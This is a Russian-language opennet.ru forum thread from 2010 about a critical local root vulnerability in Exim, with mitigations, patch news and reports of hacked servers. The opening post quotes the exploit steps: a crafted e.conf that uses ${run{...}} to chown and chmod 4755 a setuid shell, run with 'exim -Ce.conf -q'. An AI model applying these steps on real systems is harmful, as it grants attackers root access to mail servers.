forum.opennet.ru

"В Exim обнаружена критическая уязвимость, позволяющая получи..."

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

. "В Exim обнаружена критическая уязвимость, позволяющая получи..."	+1 +/–
Сообщение от pvg (?), 09-Дек-10, 22:32
>after that attacker gets shell with id of user Debian-exim and cwd >in /var/spool/exim4 ?then it put file there file setuid with trivial execution of root shell: >[оверквотинг удален] >execl("/bin/sh", "sh", NULL); >} > >and create another file e.conf with following content: >spool_directory = ${run{/bin/chown >root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4>/setuid}} >the he runs: >exim -Ce.conf -q >and gets suid bit on /var/spool/exim4/setuid >everything else is trivial. suid да но от exim , а не от root я
Ответить \| Правка \| Наверх \| Cообщить модератору

Оглавление

В Exim обнаружена критическая уязвимость, позволяющая получи..., opennews, 09-Дек-10, 17:47 [смотреть все]

Больше интересен не эксплоит, а то, каким макаром в дебиане, из-под обычного пол, б.б., 09-Дек-10, 17:47 (1) //
- читаем между строк был сформирован файл setuid c кодом, призванным предостави, zmey, 09-Дек-10, 17:54 (3) //
  - Насколько я понял, на этапе инициализации он все равно от рута работает, что и п, non anon, 09-Дек-10, 18:32 (7) //
    - Когда вы начните учить матчасть , NaN, 09-Дек-10, 18:51 (12)
      - У вас какая-то особенная матчасть, которой нет у других , non anon, 09-Дек-10, 19:21 (15)
      - конфиг читается от рута, в конфиге указано run chmod 4755 - троян делает, гы, 09-Дек-10, 21:10 (26)
        
        они писали e conf в var spool exim4 , Аноним, 09-Дек-10, 22:48 (31)
        
        по дефолту exim читает из var spool exim4 конфиги , txt, 09-Дек-10, 23:58 (35)
        
        нет они его по дефолту запускали из этого каталога шеллкодом , Аноним, 10-Дек-10, 00:32 (36)
- Бинарник exim setuid ный от рута При локальной доставке письма начальный процес, tux2002, 10-Дек-10, 12:10 (59)
Убиться Кто-то тут давеча рассказывал, что exim был чуть ли не переписан и тепе, Viliar, 09-Дек-10, 17:52 (2) //
- Пока систему разрабатывает человек, в ней никогда не может быть 100 -ой безопасн, SubGun, 09-Дек-10, 18:50 (10) //
  - Это понятно Но я вот о таком http opennet ru openforum vsluhforumID3 64241 ht, Viliar, 09-Дек-10, 21:01 (24) //
    - А чот я давно этого парня здесь не слышал - , artemrts, 09-Дек-10, 21:07 (25)
    - На тот момент он был прав, разве не так , Pilat, 10-Дек-10, 17:57 (80)
      - В чем прав В том, что buffer owerflow судя по changelog фиксять сравнительно ре, Viliar, 11-Дек-10, 17:39 (109)
        
        Ну а я считаю, что он прав Насчет криворукости того админа тоже Не сочтите за , SubGun, 12-Дек-10, 00:48 (112)
        
        Очевидно, что Вамa Повезлоb Changelog и Вы ну совсем не читаете , Viliar, 23-Дек-10, 18:30 (126)
в момент взлома был включен tcpdump , Аноним, 09-Дек-10, 18:15 (4) //
- я тоже что то не понял у них он перманентно включен что ли , axe, 09-Дек-10, 18:20 (5) //
  - Угу, сидят фтыкают в вывод с -X, мониторят взломы , xeon, 09-Дек-10, 18:42 (9)
  - Видимо не первый случай , pavlinux, 09-Дек-10, 18:52 (13) //
    - не первый случай honeypot, dejuren, 09-Дек-10, 20:32 (23)
  - Ну вот у меня pflogd на некоторых серверах сохраняет весь интересный траффик за , PereresusNeVlezaetBuggy, 10-Дек-10, 12:16 (60) //
    - Круто, молодец , Аноним, 10-Дек-10, 15:26 (71)
Ключевой момент create another file e conf with following content spool_director, dimss, 09-Дек-10, 18:27 (6) //
- pavel suse64 tmp testpavel suse64 tmp chown root root testchown изменение, pavlinux, 09-Дек-10, 18:35 (8) //
  - Если я правильно понимаю, он запускается с правами рута, а потом сбрасывает прив, Аноним, 09-Дек-10, 18:51 (11) //
    - Зимело Одинокий парсер бродил по конфигу Exim Команды в exim были рыхлые и неро, б.б., 09-Дек-10, 20:12 (18)
      - Схоронил , Мужик32, 10-Дек-10, 02:01 (38)
      - я думаю там еще и смеркалось , ЬТЛ, 10-Дек-10, 09:36 (49)
    - какой парсинг что хекеры блин ждут момента када админ перезапустит экзим да на, Sw00p aka Jerom, 09-Дек-10, 20:21 (21)
      - а sbin у exim-а зачем стоит , Аноним, 10-Дек-10, 15:36 (73)
        
        Пардон, tr sbin suid , Аноним, 10-Дек-10, 15:36 (74)
        
        Наверное что бы захватить SMTP порт , Витольд Седышев, 11-Дек-10, 14:13 (97)
        
        один про валенки, другой про синее, Аноним, 11-Дек-10, 19:35 (110)
А как-то уже отвыклось от таких серьезных ошибках в Эксиме , artemrts, 09-Дек-10, 19:46 (16)
Кто-то нашел уязвимость, взломал чей-то сервер, и когда взламывали, подробности , Wormik, 09-Дек-10, 20:09 (17) //
- Сначала патч, потом твоё любопытство , б.б., 09-Дек-10, 20:12 (19)
делаем от себя простого юзера pvg c iduid 231 pvg gid 500 pvg группы 500 pv, pvg, 09-Дек-10, 21:59 (27) //
- Запускать нужно от пользователя до которого exim сбрасывает привилегии , Аноним, 09-Дек-10, 22:04 (28) //
  - then it put file there file setuid with trivial execution of root shell gt ов , pvg, 09-Дек-10, 22:32 (29)
Где патчи , Одмин, 09-Дек-10, 22:47 (30) //
- chmod -w var spool exim4 на первое время поставил, от дураков , Дмитрий, 10-Дек-10, 00:59 (37) //
  - Спасибо Пока самое адекватное решение от скрипт-киддис и ботов Судя по mailing, Одмин, 10-Дек-10, 03:49 (39) //
    - А еще это решение отлично помогает от спама - 100 срезается, утер, 10-Дек-10, 05:35 (40)
      - А вот и нет К сожалению , Дмитрий, 10-Дек-10, 09:40 (50)
When this option is used by a caller other than root or the Exi, Аноним, 09-Дек-10, 22:59 (32)
и такbash-3 2 uname -aLinux hhh ddd xxxx 2 6 18-194 26 1 el5 1 SMP Tue Nov 9 1, pvg, 09-Дек-10, 23:22 (33)
Извините, ошибся, у меня suid, в конфе setuidк сожалению в el5 работает, а в RH9, pvg, 09-Дек-10, 23:46 (34)
А я пока сделал так от рута, Docent, 10-Дек-10, 07:34 (41) //
- и как оно поможет , Аноним, 10-Дек-10, 15:46 (75)
1 Тем у кого стоит exim - Немедленно снести 2 Найти знакомых-умников, кто с пе, csup, 10-Дек-10, 08:06 (42) //
- готово я сделал спасибо за подробную инструкцию-наловил лулзов с любителей exim, патрон, 10-Дек-10, 08:21 (44)
- Лучше не использовать компы вообще - так уж точно безопасно Если, конечно, ки, IGX, 10-Дек-10, 13:53 (69)
да просто отменить suid в каталоге спула exim через моунт, обычно это так делает, Аноним, 10-Дек-10, 08:16 (43) //
- а если спул exim-а находится на разделе на который нет возможности поставить, Бару, 10-Дек-10, 08:38 (45) //
  - dd if dev zero of var exim file bs 1M count 1024mkfs ext3 -m0 var exim filemo, утер, 10-Дек-10, 08:59 (46)
  - а это уже проблема безопасности, не надо ложить яйца в одну корзину , Аноним, 10-Дек-10, 09:14 (47) //
    - чё за истерия я ещё в 18 00 вчерась у себя на всех сделал, и спал спокойноsrv0, lissyara, 10-Дек-10, 09:17 (48)
      - О, великий и ужасный lissyara, низкий поклон уважаемому покорителю BSD Дайте с, Аноним, 10-Дек-10, 11:07 (52)
      - tmpfs на спуле Т е при внезапном power failure вся неушедшая почта уходит в де, samm, 10-Дек-10, 18:20 (81)
        
        ну, не все же сервера дома под столом держат, или на железе кривом, что в панику, lissyara, 10-Дек-10, 18:53 (84)
        
        Вот как меня подобное радует Вы со времен терок про proftpd совсем не изменилис, samm, 10-Дек-10, 19:44 (89)
        
        Поддерживаю, чем больше парк машин, тем больше возникает странностей и тем быс, Аноним, 11-Дек-10, 06:03 (95)
        и не планирую как я был неадекватом всю жизнь, так и помру им что касается и, lissyara, 11-Дек-10, 17:17 (106)
        
        ууу еще и вар не отдельной фс, как все печально у вас, однако , Аноним, 11-Дек-10, 19:39 (111)
        
        та последнее время стал старый и ленивый, и балуюсь такимsrv0 df -hFilesystem , lissyara, 15-Дек-10, 00:46 (120)
  - Увольняться Потому что это говорит о профнепригодности Смешивать разделы с дан, zazik, 10-Дек-10, 10:13 (51) //
    - хе, а тут порой появляются умники, которые с пеной у рта доказывают, что один ра, Аноним, 10-Дек-10, 15:49 (76)
      - Ну и пусть доказывают Сразу видно, что они ничего серьёзнее своего десктопа с и, PereresusNeVlezaetBuggy, 10-Дек-10, 16:22 (78)
      - Если они из контор по восстановлению данных и поднятию упавших систем, то вполне, zazik, 10-Дек-10, 17:45 (79)
      - Иногда лучше все вместе, иногда отдельно А иногда вообще на отдельном диске За, SubGun, 12-Дек-10, 00:57 (113)
        
        Не вижу никаких доводов в пользу установки всего на один раздел , zazik, 13-Дек-10, 09:21 (116)
FreeBSD mount -t nullfs -o nosuid var nosuid nosuid mount 124 grep -i no, Аноним, 10-Дек-10, 11:10 (53) //
- А на RH Centos , Exim, 10-Дек-10, 11:27 (54)
- Скорее ln -s var nosuid exim var spool exim, Аноним, 10-Дек-10, 12:25 (62) //
  - Уверен Точка монтирования nosuid и через нее нужно обращаться , poz, 10-Дек-10, 12:42 (64)
- gt оверквотинг удален поставь nosuid на весь var, и успокойся, и вообще это д, Аноним, 10-Дек-10, 15:55 (77)
если нет возможности на спул поставить nosuidкак решение можно сделать так 1 сд, eugene, 10-Дек-10, 11:47 (55) //
- ну и само собой нужно настроить dovecot или что там у вас на доставку по lmtp, eugene, 10-Дек-10, 11:49 (56)
а вот так не канает тем, у кого var на том же разделе service exim stopmv var, Az, 10-Дек-10, 11:55 (57) //
- тоже неплохо,но в моем способе вообще suid с бинарника убрать можно , eugene, 10-Дек-10, 12:10 (58) //
  - попробовал убирать суид с бинарника - не может запустить cyrus-доставку, потому , Az, 10-Дек-10, 12:17 (61)
- это не работает suid атрибут всё равно можно ставить , Аноним, 10-Дек-10, 18:54 (85) //
  - Так ведь suid-бит лишь дает право запуска с правами владельца, а системный вызов, Ололо, 13-Дек-10, 07:48 (115)
Паникеры 1 Быдловендоры всяких дебианов думают что они самые умные и им не надо, xz, 10-Дек-10, 12:41 (63) //
- Вот-вот Я даже новость исправил , но изменения так и не были приняты , samm, 10-Дек-10, 12:45 (65)
- Дело не в этом, а в архитектурном решении доставки почты в exim В бумажной почт, tux2002, 10-Дек-10, 13:11 (66)
- Вина целиком на разработчиках Exim, молча исправивших такую огромную дыру В при, Аноним, 10-Дек-10, 13:21 (67) //
  - У вас какой-то свой, особенный changelog Вот тут все более чем ясно ftp ftp e, samm, 10-Дек-10, 13:45 (68) //
    - Потенциальное переполнение буфера и удалённый root 8212 это разные вещи Разр, Аноним, 10-Дек-10, 19:02 (86)
      - А еще они убили Лору Палмер и взорвали башни-близнецы Те кто не в танке - прекр, samm, 10-Дек-10, 19:27 (88)
- В Дебиане уже все пофикшено exim4 4 69-9 lenny1 stable-security urgency high , shsm, 10-Дек-10, 20:05 (90) //
  - gt оверквотинг удален Это должно было бы пофиксено два Exim овскиз релиза наза, Аноним, 15-Дек-10, 07:41 (122)
Стесьняюсь уточнить один вопрос - в заголовке сказано, что исправлено в 4 70, а , Kirill, 10-Дек-10, 14:27 (70) //
- Там две разные дыры, в 4 70 поправлена удаленная уязвимость, а в 4 72 остается л, Аноним, 10-Дек-10, 15:28 (72)
Нда Все-таки Postfix, когда не нужна большая производительность, рулит, т к , sHaggY_caT, 10-Дек-10, 18:35 (82) //
- Когда в Postfix-е сделают поддержку скриптового языка и поменяют формат лога, мо, bers666, 10-Дек-10, 19:27 (87) //
  - Имхо, любую задачу можно решить штатными средствами через транспорты на внешни, sHaggY_caT, 11-Дек-10, 02:04 (93)
- Не смешите, по поводу производительности В Постфиксе с этим все гуд Уступает о, artemrts, 10-Дек-10, 22:28 (92) //
  - Я не строила _больших_ систем на Postfix или Exim, только маштаба SMB-офиса под , sHaggY_caT, 11-Дек-10, 02:12 (94) //
    - Не стоит Postfix вполне справится и сам Вот, кстати, суточная статистика с одн, Viliar, 11-Дек-10, 16:59 (101)
      - gt оверквотинг удален А если не секрет, на чем реализован грейлистинг , artemrts, 11-Дек-10, 17:07 (105)
        
        gt оверквотинг удален milter-greylist gps postfix daemon чего-то там со своим, Viliar, 11-Дек-10, 17:32 (108)
а если пошаманить с ALT_CONFIG_PREFIX по идее ни удаленно когда exim уже сброс, Аноним, 10-Дек-10, 21:04 (91) //
- Я по памяти, когда читал документацию, помню, что запускать с альтернативным кон, tux2002, 11-Дек-10, 11:23 (96)
В CentOS она тоже есть https www centos org modules newbb viewtopic php topic, fa, 11-Дек-10, 15:29 (98) //
- Хорошо бы уточнить версии Exim и CentOS, Аноним, 11-Дек-10, 17:05 (104) //
  - По ссылкам ходили , fa, 12-Дек-10, 03:05 (114)
как хорошо что я на postfix сижу было у меня 6 лет назад предубеждение к экзим, deadless, 11-Дек-10, 15:41 (99)
Ты думаешь твой сервер на 10 человек кому то нужен Тогда мы идем к вам , ALex_hha, 11-Дек-10, 16:07 (100) //
- С возвращением, товарисч Как, ваше мнение с предыдущего топика не изменилось , Viliar, 11-Дек-10, 17:00 (102) //
  - товарисч - идолопоклонник рхела у таких - мнение не меняется , lissyara, 11-Дек-10, 17:19 (107) //
    - дак на FreeBSD те же грабли D Почитай список рассылки , ALex_hha, 13-Дек-10, 16:06 (118)
Нет, ибо мой топик был относительно того времени, когда экзим разрабатывал Хазел, ALex_hha, 11-Дек-10, 17:04 (103) //
- И Claus Assmann MeTA1 , Аноним, 13-Дек-10, 13:17 (117)
Блин, поломали Стоит CentOS release 5 4 Final с exim 4 63-3 el5 Залили в tm, mega4el, 14-Дек-10, 20:04 (119) //
- Переставить систему, Аноним, 15-Дек-10, 07:39 (121)
также систему на centos поломали есть ли версия 4 70 exim x86_64 для centos , pasha, 16-Дек-10, 14:49 (123) //
- Для CentOS вышло обновление Это не 4 70, но уязвимость там пофикшена , Аноним, 19-Дек-10, 03:11 (125)
ещё и dovecot накрылся вся входящая почта пропала и новые письма не приходят , pasha, 16-Дек-10, 15:45 (124)
Вопрос к профессионалам от НубаМожно ли защититься от этой проблемы косвенным об, Начинающий, 10-Июн-19, 21:36 (127)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру